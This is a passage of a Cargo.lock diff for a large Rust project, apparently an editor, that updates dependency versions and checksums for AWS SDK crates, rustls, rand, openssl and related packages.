"tokio-rustls 0.26.4", "tungstenite 0.27.0", ] @@ -1349,9 +1349,9 @@ dependencies = [ [[package]] name = "aws-config" -version = "1.8.10" +version = "1.8.14" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1856b1b48b65f71a4dd940b1c0931f9a7b646d4a924b9828ffefc1454714668a" +checksum = "8a8fc176d53d6fe85017f230405e3255cedb4a02221cb55ed6d76dccbbb099b2" dependencies = [ "aws-credential-types", "aws-runtime", @@ -1379,9 +1379,9 @@ dependencies = [ [[package]] name = "aws-credential-types" -version = "1.2.10" +version = "1.2.12" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b01c9521fa01558f750d183c8c68c81b0155b9d193a4ba7f84c36bd1b6d04a06" +checksum = "e26bbf46abc608f2dc61fd6cb3b7b0665497cc259a21520151ed98f8b37d2c79" dependencies = [ "aws-smithy-async", "aws-smithy-runtime-api", @@ -1391,9 +1391,9 @@ dependencies = [ 
[[package]] name = "aws-lc-rs" -version = "1.15.4" +version = "1.16.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7b7b6141e96a8c160799cc2d5adecd5cbbe5054cb8c7c4af53da0f83bb7ad256" +checksum = "0ec6fb3fe69024a75fa7e1bfb48aa6cf59706a101658ea01bfd33b2b248a038f" dependencies = [ "aws-lc-sys", "untrusted 0.7.1", @@ -1402,9 +1402,9 @@ dependencies = [ [[package]] name = "aws-lc-sys" -version = "0.37.0" +version = "0.40.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5c34dda4df7017c8db52132f0f8a2e0f8161649d15723ed63fc00c82d0f2081a" +checksum = "f50037ee5e1e41e7b8f9d161680a725bd1626cb6f8c7e901f91f942850852fe7" dependencies = [ "cc", "cmake", @@ -1414,9 +1414,9 @@ dependencies = [ [[package]] name = "aws-runtime" -version = "1.5.16" +version = "1.7.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7ce527fb7e53ba9626fc47824f25e256250556c40d8f81d27dd92aa38239d632" +checksum = "b0f92058d22a46adf53ec57a6a96f34447daf02bff52e8fb956c66bcd5c6ac12" dependencies = [ "aws-credential-types", "aws-sigv4", @@ -1428,9 +1428,12 @@ dependencies = [ "aws-smithy-types", "aws-types", "bytes 1.11.1", + "bytes-utils", "fastrand 2.3.0", "http 0.2.12", + "http 1.3.1", "http-body 0.4.6", + "http-body 1.0.1", "percent-encoding", "pin-project-lite", "tracing", @@ -1439,9 +1442,9 @@ dependencies = [ [[package]] name = "aws-sdk-bedrockruntime" -version = "1.113.0" +version = "1.125.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d5d2b8f081b9e8ff455b8dd7387b6b02263c3dac73172d188d2b523ff1e775e9" +checksum = "731e9a808701bdc7c6e27dfbc284f5b40c30ac0392a2e58e3bc855b243a7c967" dependencies = [ "aws-credential-types", "aws-runtime", @@ -1450,6 +1453,7 @@ dependencies = [ "aws-smithy-eventstream", "aws-smithy-http", "aws-smithy-json", + "aws-smithy-observability", "aws-smithy-runtime", "aws-smithy-runtime-api", "aws-smithy-types", @@ -1457,16 +1461,17 @@ dependencies = [ "bytes 
1.11.1", "fastrand 2.3.0", "http 0.2.12", - "hyper 0.14.32", + "http 1.3.1", + "http-body-util", "regex-lite", "tracing", ] [[package]] name = "aws-sdk-kinesis" -version = "1.95.0" +version = "1.100.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9c3b2ce941308de56f5c2f69490497610e1a815ce968c9ac0796ab165f25205d" +checksum = "5769458ed398a643d6f0a6307077311fe253655d9f3ecc3e53069dc61cbcc98c" dependencies = [ "aws-credential-types", "aws-runtime", @@ -1474,6 +1479,7 @@ dependencies = [ "aws-smithy-eventstream", "aws-smithy-http", "aws-smithy-json", + "aws-smithy-observability", "aws-smithy-runtime", "aws-smithy-runtime-api", "aws-smithy-types", @@ -1481,15 +1487,16 @@ dependencies = [ "bytes 1.11.1", "fastrand 2.3.0", "http 0.2.12", + "http 1.3.1", "regex-lite", "tracing", ] [[package]] name = "aws-sdk-s3" -version = "1.112.0" +version = "1.123.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "eee73a27721035c46da0572b390a69fbdb333d0177c24f3d8f7ff952eeb96690" +checksum = "c018f22146966fdd493a664f62ee2483dff256b42a08c125ab6a084bde7b77fe" dependencies = [ "aws-credential-types", "aws-runtime", @@ -1499,6 +1506,7 @@ dependencies = [ "aws-smithy-eventstream", "aws-smithy-http", "aws-smithy-json", + "aws-smithy-observability", "aws-smithy-runtime", "aws-smithy-runtime-api", "aws-smithy-types", @@ -1510,7 +1518,7 @@ dependencies = [ "hmac", "http 0.2.12", "http 1.3.1", - "http-body 0.4.6", + "http-body 1.0.1", "lru", "percent-encoding", "regex-lite", @@ -1521,15 +1529,16 @@ dependencies = [ [[package]] name = "aws-sdk-sso" -version = "1.88.0" +version = "1.94.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d05b276777560aa9a196dbba2e3aada4d8006d3d7eeb3ba7fe0c317227d933c4" +checksum = "699da1961a289b23842d88fe2984c6ff68735fdf9bdcbc69ceaeb2491c9bf434" dependencies = [ "aws-credential-types", "aws-runtime", "aws-smithy-async", "aws-smithy-http", "aws-smithy-json", + 
"aws-smithy-observability", "aws-smithy-runtime", "aws-smithy-runtime-api", "aws-smithy-types", @@ -1537,21 +1546,23 @@ dependencies = [ "bytes 1.11.1", "fastrand 2.3.0", "http 0.2.12", + "http 1.3.1", "regex-lite", "tracing", ] [[package]] name = "aws-sdk-ssooidc" -version = "1.90.0" +version = "1.96.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f9be14d6d9cd761fac3fd234a0f47f7ed6c0df62d83c0eeb7012750e4732879b" +checksum = "e3e3a4cb3b124833eafea9afd1a6cc5f8ddf3efefffc6651ef76a03cbc6b4981" dependencies = [ "aws-credential-types", "aws-runtime", "aws-smithy-async", "aws-smithy-http", "aws-smithy-json", + "aws-smithy-observability", "aws-smithy-runtime", "aws-smithy-runtime-api", "aws-smithy-types", @@ -1559,21 +1570,23 @@ dependencies = [ "bytes 1.11.1", "fastrand 2.3.0", "http 0.2.12", + "http 1.3.1", "regex-lite", "tracing", ] [[package]] name = "aws-sdk-sts" -version = "1.90.0" +version = "1.98.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "98a862d704c817d865c8740b62d8bbeb5adcb30965e93b471df8a5bcefa20a80" +checksum = "89c4f19655ab0856375e169865c91264de965bd74c407c7f1e403184b1049409" dependencies = [ "aws-credential-types", "aws-runtime", "aws-smithy-async", "aws-smithy-http", "aws-smithy-json", + "aws-smithy-observability", "aws-smithy-query", "aws-smithy-runtime", "aws-smithy-runtime-api", @@ -1582,15 +1595,16 @@ dependencies = [ "aws-types", "fastrand 2.3.0", "http 0.2.12", + "http 1.3.1", "regex-lite", "tracing", ] [[package]] name = "aws-sigv4" -version = "1.3.6" +version = "1.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c35452ec3f001e1f2f6db107b6373f1f48f05ec63ba2c5c9fa91f07dad32af11" +checksum = "68f6ae9b71597dc5fd115d52849d7a5556ad9265885ad3492ea8d73b93bbc46e" dependencies = [ "aws-credential-types", "aws-smithy-eventstream", @@ -1616,9 +1630,9 @@ dependencies = [ [[package]] name = "aws-smithy-async" -version = "1.2.6" +version = "1.2.14" source = 
"registry+https://github.com/rust-lang/crates.io-index" -checksum = "127fcfad33b7dfc531141fda7e1c402ac65f88aca5511a4d31e2e3d2cd01ce9c" +checksum = "2ffcaf626bdda484571968400c326a244598634dc75fd451325a54ad1a59acfc" dependencies = [ "futures-util", "pin-project-lite", @@ -1627,17 +1641,18 @@ dependencies = [ [[package]] name = "aws-smithy-checksums" -version = "0.63.11" +version = "0.64.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "95bd108f7b3563598e4dc7b62e1388c9982324a2abd622442167012690184591" +checksum = "a764fa7222922f6c0af8eea478b0ef1ba5ce1222af97e01f33ca5e957bd7f3b9" dependencies = [ "aws-smithy-http", "aws-smithy-types", "bytes 1.11.1", "crc-fast", "hex", - "http 0.2.12", - "http-body 0.4.6", + "http 1.3.1", + "http-body 1.0.1", + "http-body-util", "md-5", "pin-project-lite", "sha1", @@ -1647,9 +1662,9 @@ dependencies = [ [[package]] name = "aws-smithy-eventstream" -version = "0.60.13" +version = "0.60.20" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e29a304f8319781a39808847efb39561351b1bb76e933da7aa90232673638658" +checksum = "faf09d74e5e32f76b8762da505a3cd59303e367a664ca67295387baa8c1d7548" dependencies = [ "aws-smithy-types", "bytes 1.11.1", @@ -1658,9 +1673,9 @@ dependencies = [ [[package]] name = "aws-smithy-http" -version = "0.62.5" +version = "0.63.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "445d5d720c99eed0b4aa674ed00d835d9b1427dd73e04adaf2f94c6b2d6f9fca" +checksum = "af4a8a5fe3e4ac7ee871237c340bbce13e982d37543b65700f4419e039f5d78e" dependencies = [ "aws-smithy-eventstream", "aws-smithy-runtime-api", @@ -1669,9 +1684,9 @@ dependencies = [ "bytes-utils", "futures-core", "futures-util", - "http 0.2.12", "http 1.3.1", - "http-body 0.4.6", + "http-body 1.0.1", + "http-body-util", "percent-encoding", "pin-project-lite", "pin-utils", @@ -1680,9 +1695,9 @@ dependencies = [ [[package]] name = "aws-smithy-http-client" -version = "1.1.4" +version = "1.1.10" 
source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "623254723e8dfd535f566ee7b2381645f8981da086b5c4aa26c0c41582bb1d2c" +checksum = "0709f0083aa19b704132684bc26d3c868e06bd428ccc4373b0b55c3e8748a58b" dependencies = [ "aws-smithy-async", "aws-smithy-runtime-api", @@ -1695,42 +1710,42 @@ dependencies = [ "hyper 0.14.32", "hyper 1.7.0", "hyper-rustls 0.24.2", - "hyper-rustls 0.27.7", + "hyper-rustls 0.27.9", "hyper-util", "pin-project-lite", "rustls 0.21.12", - "rustls 0.23.33", - "rustls-native-certs 0.8.2", + "rustls 0.23.40", + "rustls-native-certs 0.8.3", "rustls-pki-types", "tokio", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.4", "tower 0.5.2", "tracing", ] [[package]] name = "aws-smithy-json" -version = "0.61.7" +version = "0.62.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2db31f727935fc63c6eeae8b37b438847639ec330a9161ece694efba257e0c54" +checksum = "9648b0bb82a2eedd844052c6ad2a1a822d1f8e3adee5fbf668366717e428856a" dependencies = [ "aws-smithy-types", ] [[package]] name = "aws-smithy-observability" -version = "0.1.4" +version = "0.2.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2d1881b1ea6d313f9890710d65c158bdab6fb08c91ea825f74c1c8c357baf4cc" +checksum = "4d3f39d5bb871aaf461d59144557f16d5927a5248a983a40654d9cf3b9ba183b" dependencies = [ "aws-smithy-runtime-api", ] [[package]] name = "aws-smithy-query" -version = "0.60.8" +version = "0.60.15" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d28a63441360c477465f80c7abac3b9c4d075ca638f982e605b7dc2a2c7156c9" +checksum = "1a56d79744fb3edb5d722ef79d86081e121d3b9422cb209eb03aea6aa4f21ebd" dependencies = [ "aws-smithy-types", "urlencoding", @@ -1738,9 +1753,9 @@ dependencies = [ [[package]] name = "aws-smithy-runtime" -version = "1.9.4" +version = "1.10.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0bbe9d018d646b96c7be063dd07987849862b0e6d07c778aad7d93d1be6c1ef0" 
+checksum = "8fd3dfc18c1ce097cf81fced7192731e63809829c6cbf933c1ec47452d08e1aa" dependencies = [ "aws-smithy-async", "aws-smithy-http", @@ -1754,6 +1769,7 @@ dependencies = [ "http 1.3.1", "http-body 0.4.6", "http-body 1.0.1", + "http-body-util", "pin-project-lite", "pin-utils", "tokio", @@ -1762,9 +1778,9 @@ dependencies = [ [[package]] name = "aws-smithy-runtime-api" -version = "1.9.2" +version = "1.11.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ec7204f9fd94749a7c53b26da1b961b4ac36bf070ef1e0b94bb09f79d4f6c193" +checksum = "8c55e0837e9b8526f49e0b9bfa9ee18ddee70e853f5bc09c5d11ebceddcb0fec" dependencies = [ "aws-smithy-async", "aws-smithy-types", @@ -1779,9 +1795,9 @@ dependencies = [ [[package]] name = "aws-smithy-types" -version = "1.3.4" +version = "1.4.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "25f535879a207fce0db74b679cfc3e91a3159c8144d717d55f5832aea9eef46e" +checksum = "9d73dbfbaa8e4bc57b9045137680b958d274823509a360abfd8e1d514d40c95c" dependencies = [ "base64-simd", "bytes 1.11.1", @@ -1805,18 +1821,18 @@ dependencies = [ [[package]] name = "aws-smithy-xml" -version = "0.60.12" +version = "0.60.15" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "eab77cdd036b11056d2a30a7af7b775789fb024bf216acc13884c6c97752ae56" +checksum = "0ce02add1aa3677d022f8adf81dcbe3046a95f17a1b1e8979c145cd21d3d22b3" dependencies = [ "xmlparser", ] [[package]] name = "aws-types" -version = "1.3.10" +version = "1.3.12" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d79fb68e3d7fe5d4833ea34dc87d2e97d26d3086cb3da660bb6b1f76d98680b6" +checksum = "6c50f3cdf47caa8d01f2be4a6663ea02418e892f9bbfd82c7b9a3a37eaccdd3a" dependencies = [ "aws-credential-types", "aws-smithy-async", @@ -2242,7 +2258,7 @@ dependencies = [ "language", "log", "pretty_assertions", - "rand 0.9.3", + "rand 0.9.4", "rope", "settings", "sum_tree", @@ -2493,7 +2509,7 @@ dependencies = [ "memmap2", 
"num-traits", "num_cpus", - "rand 0.9.3", + "rand 0.9.4", "rand_distr", "rayon", "safetensors", @@ -2577,7 +2593,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "0acb89ccf798a28683f00089d0630dfaceec087234eae0d308c05ddeaa941b40" dependencies = [ "ambient-authority", - "rand 0.8.5", + "rand 0.8.6", ] [[package]] @@ -2978,7 +2994,7 @@ dependencies = [ "parking_lot", "paths", "postage", - "rand 0.9.3", + "rand 0.9.4", "regex", "release_channel", "rpc", @@ -2998,7 +3014,7 @@ dependencies = [ "tiny_http", "tokio", "tokio-native-tls", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.4", "tokio-socks", "url", "util", @@ -3229,7 +3245,7 @@ dependencies = [ "prometheus", "prompt_store", "prost 0.9.0", - "rand 0.9.3", + "rand 0.9.4", "recent_projects", "release_channel", "remote", @@ -3568,7 +3584,7 @@ dependencies = [ "parking_lot", "pollster 0.4.0", "postage", - "rand 0.9.3", + "rand 0.9.4", "schemars 1.0.4", "serde", "serde_json", @@ -4141,15 +4157,14 @@ checksum = "19d374276b40fb8bbdee95aef7c7fa6b5316ec764510eb64b8dd0e2ed0d7e7f5" [[package]] name = "crc-fast" -version = "1.6.0" +version = "1.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6ddc2d09feefeee8bd78101665bd8645637828fa9317f9f292496dbbd8c65ff3" +checksum = "2fd92aca2c6001b1bf5ba0ff84ee74ec8501b52bbef0cac80bf25a6c1d87a83d" dependencies = [ "crc", "digest", - "rand 0.9.3", - "regex", "rustversion", + "spin 0.10.0", ] [[package]] @@ -4936,7 +4951,7 @@ dependencies = [ "markdown", "pretty_assertions", "project", - "rand 0.9.3", + "rand 0.9.4", "serde", "serde_json", "settings", @@ -5006,7 +5021,7 @@ dependencies = [ "libc", "option-ext", "redox_users", - "windows-sys 0.61.2", + "windows-sys 0.59.0", ] [[package]] @@ -5262,7 +5277,7 @@ dependencies = [ "pretty_assertions", "project", "pulldown-cmark 0.13.0", - "rand 0.9.3", + "rand 0.9.4", "regex", "release_channel", "semver", @@ -5327,7 +5342,7 @@ dependencies = [ "pretty_assertions", "project", 
"prompt_store", - "rand 0.9.3", + "rand 0.9.4", "release_channel", "reqwest_client", "rust-embed", @@ -5488,7 +5503,7 @@ dependencies = [ "project", "proptest", "proptest-derive", - "rand 0.9.3", + "rand 0.9.4", "regex", "release_channel", "rope", @@ -5795,7 +5810,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "39cab71617ae0d63f51a36d69f866391735b51691dbda63cf6f96d042b63efeb" dependencies = [ "libc", - "windows-sys 0.61.2", + "windows-sys 0.52.0", ] [[package]] @@ -6391,7 +6406,7 @@ checksum = "4203231de188ebbdfb85c11f3c20ca2b063945710de04e7b59268731e728b462" dependencies = [ "half", "num-traits", - "rand 0.9.3", + "rand 0.9.4", "rand_distr", ] @@ -6862,7 +6877,7 @@ dependencies = [ "fnv", "itertools 0.10.5", "num-traits", - "rand 0.8.5", + "rand 0.8.6", "rand_pcg", "random_choice", "rayon", @@ -7253,7 +7268,7 @@ dependencies = [ "gobject-sys", "libc", "system-deps", - "windows-sys 0.61.2", + "windows-sys 0.52.0", ] [[package]] @@ -7274,7 +7289,7 @@ dependencies = [ "log", "parking_lot", "pretty_assertions", - "rand 0.9.3", + "rand 0.9.4", "regex", "rope", "schemars 1.0.4", @@ -7325,7 +7340,7 @@ dependencies = [ "menu", "project", "project_panel", - "rand 0.9.3", + "rand 0.9.4", "remote_connection", "search", "serde_json", @@ -7399,7 +7414,7 @@ dependencies = [ "project", "prompt_store", "proto", - "rand 0.9.3", + "rand 0.9.4", "remote", "remote_connection", "schemars 1.0.4", @@ -7685,7 +7700,7 @@ dependencies = [ "postage", "profiling", "proptest", - "rand 0.9.3", + "rand 0.9.4", "raw-window-handle", "refineable", "regex", @@ -7921,7 +7936,7 @@ dependencies = [ "itertools 0.14.0", "log", "parking_lot", - "rand 0.9.3", + "rand 0.9.4", "raw-window-handle", "smallvec", "util", @@ -7964,9 +7979,9 @@ dependencies = [ [[package]] name = "grid" -version = "1.0.0" +version = "1.0.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f9e2d4c0a8296178d8802098410ca05d86b17a10bb5ab559b3fb404c1f948220" +checksum = 
"b40ca9252762c466af32d0b1002e91e4e1bc5398f77455e55474deb466355ff5" [[package]] name = "group" @@ -8027,7 +8042,7 @@ dependencies = [ "cfg-if", "crunchy", "num-traits", - "rand 0.9.3", + "rand 0.9.4", "rand_distr", "zerocopy", ] @@ -8431,7 +8446,7 @@ dependencies = [ name = "http_client_tls" version = "0.1.0" dependencies = [ - "rustls 0.23.33", + "rustls 0.23.40", "rustls-platform-verifier", ] @@ -8516,26 +8531,24 @@ dependencies = [ "hyper 0.14.32", "log", "rustls 0.21.12", - "rustls-native-certs 0.6.3", "tokio", "tokio-rustls 0.24.1", ] [[package]] name = "hyper-rustls" -version = "0.27.7" +version = "0.27.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e3c93eb611681b207e1fe55d5a71ecf91572ec8a6705cdb6857f7d8d5242cf58" +checksum = "33ca68d021ef39cf6463ab54c1d0f5daf03377b70561305bb89a8f83aab66e0f" dependencies = [ "http 1.3.1", "hyper 1.7.0", "hyper-util", "log", - "rustls 0.23.33", - "rustls-native-certs 0.8.2", - "rustls-pki-types", + "rustls 0.23.40", + "rustls-native-certs 0.8.3", "tokio", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.4", "tower-service", ] @@ -8583,7 +8596,7 @@ dependencies = [ "libc", "percent-encoding", "pin-project-lite", - "socket2 0.5.10", + "socket2 0.6.3", "tokio", "tower-service", "tracing", @@ -9040,8 +9053,8 @@ dependencies = [ "fnv", "lazy_static", "libc", - "mio 1.1.0", - "rand 0.8.5", + "mio 1.2.0", + "rand 0.8.6", "serde", "tempfile", "uuid", @@ -9138,9 +9151,9 @@ dependencies = [ [[package]] name = "itoa" -version = "1.0.15" +version = "1.0.18" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4a5f13b858c8d314ee3e8f639011f7ccefe71f97f96e50151fb991f267928e2c" +checksum = "8f42a60cbdf9a97f5d2305f08a87dc4e09308d1276d28c869c684d7777685682" [[package]] name = "jiff" @@ -9484,7 +9497,7 @@ dependencies = [ "parking_lot", "postage", "pretty_assertions", - "rand 0.9.3", + "rand 0.9.4", "regex", "rpc", "semver", @@ -9861,9 +9874,9 @@ checksum = 
"2c4a545a15244c7d945065b5d392b2d2d7f21526fba56ce51467b06ed445e8f7" [[package]] name = "libc" -version = "0.2.182" +version = "0.2.186" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6800badb6cb2082ffd7b6a67e6125bb39f18782f793520caee8cb8846be06112" +checksum = "68ab91017fe16c622486840e4c83c9a37afeff978bd239b5293d61ece587de66" [[package]] name = "libdbus-sys" @@ -10083,7 +10096,7 @@ dependencies = [ "parking_lot", "pbjson-types", "prost 0.12.6", - "rand 0.9.3", + "rand 0.9.4", "reqwest 0.12.24", "rustls-native-certs 0.6.3", "scopeguard", @@ -10091,7 +10104,7 @@ dependencies = [ "sha2", "thiserror 1.0.69", "tokio", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.4", "tokio-tungstenite 0.28.0", "url", ] @@ -10243,11 +10256,11 @@ dependencies = [ [[package]] name = "lru" -version = "0.12.5" +version = "0.16.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "234cf4f4a04dc1f57e24b96cc0cd600cf2af460d4161ac5ecdd0af8e1f3b2a38" +checksum = "7f66e8d5d03f609abc3a39e6f08e4164ebf1447a732906d39eb9b99b7919ef39" dependencies = [ - "hashbrown 0.15.5", + "hashbrown 0.16.1", ] [[package]] @@ -10833,9 +10846,9 @@ dependencies = [ [[package]] name = "mio" -version = "1.1.0" +version = "1.2.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "69d83b0086dc8ecf3ce9ae2874b2d1290252e2a30720bea58a5c6639b0092873" +checksum = "50b7e5b27aa02a74bac8c3f23f448f8d87ff11f92d3aac1a6ed369ee08cc56c1" dependencies = [ "libc", "log", @@ -10919,7 +10932,7 @@ dependencies = [ "log", "parking_lot", "pretty_assertions", - "rand 0.9.3", + "rand 0.9.4", "rope", "serde", "settings", @@ -10972,7 +10985,7 @@ version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "3ffa00dec017b5b1a8b7cf5e2c008bfda1aa7e0697ac1508b491fdf2622fb4d8" dependencies = [ - "rand 0.8.5", + "rand 0.8.6", ] [[package]] @@ -10986,17 +10999,17 @@ dependencies = [ [[package]] name = "native-tls" -version = "0.2.14" +version 
= "0.2.18" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "87de3442987e9dbec73158d5c715e7ad9072fda936bb03d19d7fa10e00520f0e" +checksum = "465500e14ea162429d264d44189adc38b199b62b1c21eea9f69e4b73cb03bbf2" dependencies = [ "libc", "log", "openssl", - "openssl-probe", + "openssl-probe 0.2.1", "openssl-sys", "schannel", - "security-framework 2.11.1", + "security-framework 3.5.1", "security-framework-sys", "tempfile", ] @@ -11213,7 +11226,7 @@ dependencies = [ "kqueue", "libc", "log", - "mio 1.1.0", + "mio 1.2.0", "notify-types", "walkdir", "windows-sys 0.60.2", @@ -11250,7 +11263,7 @@ version = "0.50.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7957b9740744892f114936ab4a57b3f487491bbeafaf8083688b16841a4240e5" dependencies = [ - "windows-sys 0.61.2", + "windows-sys 0.59.0", ] [[package]] @@ -11309,7 +11322,7 @@ dependencies = [ "num-integer", "num-iter", "num-traits", - "rand 0.8.5", + "rand 0.8.6", "smallvec", "zeroize", ] @@ -11325,7 +11338,7 @@ dependencies = [ "num-iter", "num-traits", "once_cell", - "rand 0.9.3", + "rand 0.9.4", "serde", "smallvec", "zeroize", @@ -11679,7 +11692,7 @@ dependencies = [ "http-body 1.0.1", "http-body-util", "hyper 1.7.0", - "hyper-rustls 0.27.7", + "hyper-rustls 0.27.9", "hyper-timeout", "hyper-util", "jsonwebtoken", @@ -11819,7 +11832,7 @@ dependencies = [ "language_model_core", "log", "pretty_assertions", - "rand 0.9.3", + "rand 0.9.4", "schemars 1.0.4", "serde", "serde_json", @@ -11894,15 +11907,14 @@ dependencies = [ [[package]] name = "openssl" -version = "0.10.74" +version = "0.10.79" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "24ad14dd45412269e1a30f52ad8f0664f0f4f4a89ee8fe28c3b3527021ebb654" +checksum = "bf0b434746ee2832f4f0baf10137e1cabb18cbe6912c69e2e33263c45250f542" dependencies = [ "bitflags 2.10.0", "cfg-if", "foreign-types 0.3.2", "libc", - "once_cell", "openssl-macros", "openssl-sys", ] @@ -11924,11 +11936,17 @@ version = 
"0.1.6" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "d05e27ee213611ffe7d6348b942e8f942b37114c00cc03cec254295a4a17852e" +[[package]] +name = "openssl-probe" +version = "0.2.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7c87def4c32ab89d880effc9e097653c8da5d6ef28e6b539d313baaacfbafcbe" + [[package]] name = "openssl-sys" -version = "0.9.110" +version = "0.9.115" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0a9f0075ba3c21b09f8e8b2026584b1d18d49388648f2fbbf3c97ea8deced8e2" +checksum = "158fe5b292746440aa6e7a7e690e55aeb72d41505e2804c23c6973ad0e9c9781" dependencies = [ "cc", "libc", @@ -12867,7 +12885,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "3c80231409c20246a13fddb31776fb942c38553c51e871f8cbd687a4cfb5843d" dependencies = [ "phf_shared 0.11.3", - "rand 0.8.5", + "rand 0.8.6", ] [[package]] @@ -13455,7 +13473,7 @@ dependencies = [ "prettier", "pretty_assertions", "project", - "rand 0.9.3", + "rand 0.9.4", "regex", "release_channel", "remote", @@ -13632,7 +13650,7 @@ dependencies = [ "bitflags 2.10.0", "num-traits", "proptest-macro", - "rand 0.9.3", + "rand 0.9.4", "rand_chacha 0.9.0", "rand_xorshift", "regex-syntax", @@ -13976,8 +13994,8 @@ dependencies = [ "quinn-proto", "quinn-udp", "rustc-hash 2.1.1", - "rustls 0.23.33", - "socket2 0.5.10", + "rustls 0.23.40", + "socket2 0.6.3", "thiserror 2.0.17", "tokio", "tracing", @@ -13986,17 +14004,17 @@ dependencies = [ [[package]] name = "quinn-proto" -version = "0.11.13" +version = "0.11.14" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f1906b49b0c3bc04b5fe5d86a77925ae6524a19b816ae38ce1e426255f1d8a31" +checksum = "434b42fec591c96ef50e21e886936e66d3cc3f737104fdb9b737c40ffb94c098" dependencies = [ "bytes 1.11.1", "getrandom 0.3.4", "lru-slab", - "rand 0.9.3", + "rand 0.9.4", "ring", "rustc-hash 2.1.1", - "rustls 0.23.33", + "rustls 0.23.40", "rustls-pki-types", 
"slab", "thiserror 2.0.17", @@ -14014,9 +14032,9 @@ dependencies = [ "cfg_aliases 0.2.1", "libc", "once_cell", - "socket2 0.5.10", + "socket2 0.6.3", "tracing", - "windows-sys 0.60.2", + "windows-sys 0.52.0", ] [[package]] @@ -14065,9 +14083,9 @@ dependencies = [ [[package]] name = "rand" -version = "0.8.5" +version = "0.8.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "34af8d1a0e25924bc5b7c43c079c942339d8f0a8b57c39049bef581b46327404" +checksum = "5ca0ecfa931c29007047d1bc58e623ab12e5590e8c7cc53200d5202b69266d8a" dependencies = [ "libc", "rand_chacha 0.3.1", @@ -14076,9 +14094,9 @@ dependencies = [ [[package]] name = "rand" -version = "0.9.3" +version = "0.9.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7ec095654a25171c2124e9e3393a930bddbffdc939556c914957a4c3e0a87166" +checksum = "44c5af06bb1b7d3216d91932aed5265164bf384dc89cd6ba05cf59a35f5f76ea" dependencies = [ "rand_chacha 0.9.0", "rand_core 0.9.3", @@ -14144,7 +14162,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "6a8615d50dcf34fa31f7ab52692afec947c4dd0ab803cc87cb3b0b4570ff7463" dependencies = [ "num-traits", - "rand 0.9.3", + "rand 0.9.4", ] [[package]] @@ -14222,7 +14240,7 @@ dependencies = [ "num-traits", "paste", "profiling", - "rand 0.9.3", + "rand 0.9.4", "rand_chacha 0.9.0", "simd_helpers", "thiserror 2.0.17", @@ -14774,22 +14792,22 @@ dependencies = [ "http-body 1.0.1", "http-body-util", "hyper 1.7.0", - "hyper-rustls 0.27.7", + "hyper-rustls 0.27.9", "hyper-util", "js-sys", "log", "percent-encoding", "pin-project-lite", "quinn", - "rustls 0.23.33", - "rustls-native-certs 0.8.2", + "rustls 0.23.40", + "rustls-native-certs 0.8.3", "rustls-pki-types", "serde", "serde_json", "serde_urlencoded", "sync_wrapper 1.0.2", "tokio", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.4", "tower 0.5.2", "tower-http 0.6.6", "tower-service", @@ -14961,7 +14979,7 @@ dependencies = [ "dasp_sample", "hound", "num-rational", - 
